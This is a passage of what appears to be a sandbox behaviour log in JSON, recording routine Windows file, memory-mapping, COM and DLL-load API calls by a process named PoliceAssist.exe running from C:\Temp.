                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 24
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000015bc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 25
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 26
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff735ffafc1",
            "parentcaller": "0x7ff73603de65",
            "category": "com",
            "api": "CoCreateInstanceEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "ServerName",
                "value": ""
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 27
          },
          {
            "timestamp": "2025-11-20 10:58:31,838",
            "thread_id": "3512",
            "caller": "0x7ffee10bacfe",
            "parentcaller": "0x7ffee2f93b78",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "unload"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\System32\\ShellCommonCommonProxyStub"
              },
              {
                "name": "DllBase",
                "value": "0x7ffecb1d0000"
              }
            ],
            "repeated": 0,
            "id": 28
          },
          {
            "timestamp": "2025-11-20 10:58:31,838",
            "thread_id": "3512",
            "caller": "0x7ffee34e0db0",
            "parentcaller": "0x7ffee34a0391",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecb1d0000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              }
            ],
            "repeated": 0,
            "id": 29
          },
          {
            "timestamp": "2025-11-20 10:58:33,416",
            "thread_id": "3400",
            "caller": "0x7ffecd44e842",
            "parentcaller": "0x7ffee34e16e9",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000016b0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00120089",
                "pretty_value": "FILE_GENERIC_READ"
              },
              {
                "name": "FileName",
                "value": "\\Device\\Bam"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 30
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee3496068",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0aa18000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 31
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee34964ab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0aa1b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 32
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee34964ab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0aa6b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 33
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee3496068",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0aaa2000"
              },
              {
                "name": "RegionSize",
                "value": "0x00009000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 34
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee34964ab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0aaae000"
              },
              {
                "name": "RegionSize",
                "value": "0x00006000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 35
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee3496068",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0913d000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 36
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee34964ab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x09141000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 37
          },
          {
            "timestamp": "2025-11-20 10:58:34,103",
            "thread_id": "2840",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee34964ab",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0912c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 38
          },
          {
            "timestamp": "2025-11-20 10:58:35,619",
            "thread_id": "2768",
            "caller": "0x7ff7360422e2",
            "parentcaller": "0x7ff736042e19",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05edd000"
              },
              {
                "name": "RegionSize",
                "value": "0x00008000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 39
          },
          {
            "timestamp": "2025-11-20 10:58:35,619",
            "thread_id": "2768",
            "caller": "0x7ff7360423a8",
            "parentcaller": "0x7ff736042e19",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015c8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 40
          },
          {
            "timestamp": "2025-11-20 10:58:35,619",
            "thread_id": "2768",
            "caller": "0x7ff7360423a8",
            "parentcaller": "0x7ff736042e19",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00001c40"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0012f000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 41
          },
          {
            "timestamp": "2025-11-20 10:58:35,619",
            "thread_id": "2768",
            "caller": "0x7ff7360423a8",
            "parentcaller": "0x7ff736042e19",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0012f000"
              }
            ],
            "repeated": 0,
            "id": 42
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2996",
            "caller": "0x7ff73601a297",
            "parentcaller": "0x7ff7361194e9",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b300000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 43
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2768",
            "caller": "0x00000000",
            "parentcaller": "0x00000000",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 44
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff7360599ca",
            "parentcaller": "0x7ff73605a869",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 45
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2996",
            "caller": "0x7ff73601ca89",
            "parentcaller": "0x7ff73601c93f",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000016b0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\apppatch\\sysmain.sdb"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000080",
                "pretty_value": "FILE_ATTRIBUTE_NORMAL"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 46
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2996",
            "caller": "0x7ff73601c67f",
            "parentcaller": "0x7ff73601c407",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00001cb0"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7df4df3f0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x003e3000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 47
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605bdd2",
            "parentcaller": "0x7ff73605a52a",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000016f8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 48
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605a552",
            "parentcaller": "0x7ff736059a4f",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 49
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605a552",
            "parentcaller": "0x7ff736059a4f",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000016f8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 50
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605a65f",
            "parentcaller": "0x7ff736059a4f",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 51
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2996",
            "caller": "0x7ff73601a878",
            "parentcaller": "0x7ff73601a7ba",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7df4df3f0000"
              },
              {
                "name": "RegionSize",
                "value": "0x003e3000"
              }
            ],
            "repeated": 0,
            "id": 52
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605a65f",
            "parentcaller": "0x7ff736059a4f",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4234D49B-0245-4DF3-B780-3893943456E1"
              },
              {
                "name": "ClsContext",
                "value": "0x00000401",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "000214E6-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 53
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "3400",
            "caller": "0x7ff73605a65f",
            "parentcaller": "0x7ff736059a4f",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "02C5CCF3-805F-4654-A7B7-340A74335365"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 54
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736058f2b",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 55
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736058f2b",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 56
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "4072",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee349db07",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x095a3000"
              },
              {
                "name": "RegionSize",
                "value": "0x00004000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 57
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "2768",
            "caller": "0x7ff73602fdaf",
            "parentcaller": "0x7ff736032596",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b327000"
              },
              {
                "name": "RegionSize",
                "value": "0x0000c000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 58
          },
          {
            "timestamp": "2025-11-20 10:58:35,697",
            "thread_id": "4072",
            "caller": "0x7ffee10e3013",
            "parentcaller": "0x7ffecd49672b",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000017c8"
              },
              {
                "name": "HandleName",
                "value": "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x80\\xb1\\x04\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 59
          },
          {
            "timestamp": "2025-11-20 10:58:35,713",
            "thread_id": "2768",
            "caller": "0x7ff73602fdaf",
            "parentcaller": "0x7ff736032596",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b2f8000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 60
          },
          {
            "timestamp": "2025-11-20 10:58:35,713",
            "thread_id": "4068",
            "caller": "0x7ffee347ed8a",
            "parentcaller": "0x7ffee349db07",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b336000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 61
          },
          {
            "timestamp": "2025-11-20 10:58:35,713",
            "thread_id": "2768",
            "caller": "0x7ff7360735ec",
            "parentcaller": "0x7ff73603117e",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0b343000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 62
          },
          {
            "timestamp": "2025-11-20 10:58:35,713",
            "thread_id": "2768",
            "caller": "0x7ff73605a06e",
            "parentcaller": "0x7ff736046f8c",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "DE25675A-72DE-44B4-9373-05170450C140"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 63
          },
          {
            "timestamp": "2025-11-20 10:58:35,713",
            "thread_id": "2768",
            "caller": "0x7ff73605a0c1",
            "parentcaller": "0x7ff736046f8c",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 64
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b13",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0770f000"
              },
              {
                "name": "RegionSize",
                "value": "0x00040000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 65
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00001058"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\policeassist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 66
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000df4"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 67
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": false,
            "return": "0xffffffffc000003a",
            "pretty_return": "OBJECT_PATH_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\SystemResources\\policeassist.exe.mun"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 68
          },
          {
            "timestamp": "2025-11-20 10:58:35,728",
            "thread_id": "4032",
            "caller": "0x7ff736020b6a",
            "parentcaller": "0x7ff736020a51",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
